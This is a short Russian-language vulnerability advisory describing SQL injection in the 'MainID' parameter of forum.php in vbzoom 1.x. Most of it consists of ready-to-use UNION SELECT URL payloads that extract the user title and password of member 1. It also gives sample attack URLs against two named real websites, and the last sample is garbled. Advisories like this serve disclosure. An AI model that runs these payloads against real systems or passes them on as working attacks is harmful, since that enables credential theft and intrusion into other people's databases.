Программа: vbzoom 1.x

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «MainID» сценарием forum.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Примеры:

Для имени пользователя :

/forum.php?MainID=-1%20union%20select%201,2,3,4,5, usertitle,7,8,9,10,11,12,13%20from%20 Member%20where%20Memberid%20=1/*

или

/forum.php?MainID=-1%20union%20select%201,2,3,4,5, usertitle,7,8,9,10,11,12,13,14%20from%20 Member%20where%20Memberid%20=1/*

Для пароля :

/forum.php?MainID=-1%20union%20select%201,2,3,4,5, password,7,8,9,10,11,12,13%20from%20Member %20where%20Memberid%20=1/*

или

/forum.php?MainID=-1%20union%20select%201,2,3,4,5, password,7,8,9,10,11,12,13,14%20from%20 Member%20where%20Memberid%20=1/*

Образец:

http://1yemen.com/vb//forum.php?MainID=-1%20union%20select%201,2,3, 4,5,password,7,8,9,10,11,12,13%20from%20Member%20where%20Memberid%20=1/*

, 3 4,5,password,7,8,9,10,11, 12,13,14%20from%20Member%20 where%20Memberid%20=1/*http://www.vz.elagha.net// forum.php?MainID=-1%20union%20select%201,2

Оставить мнение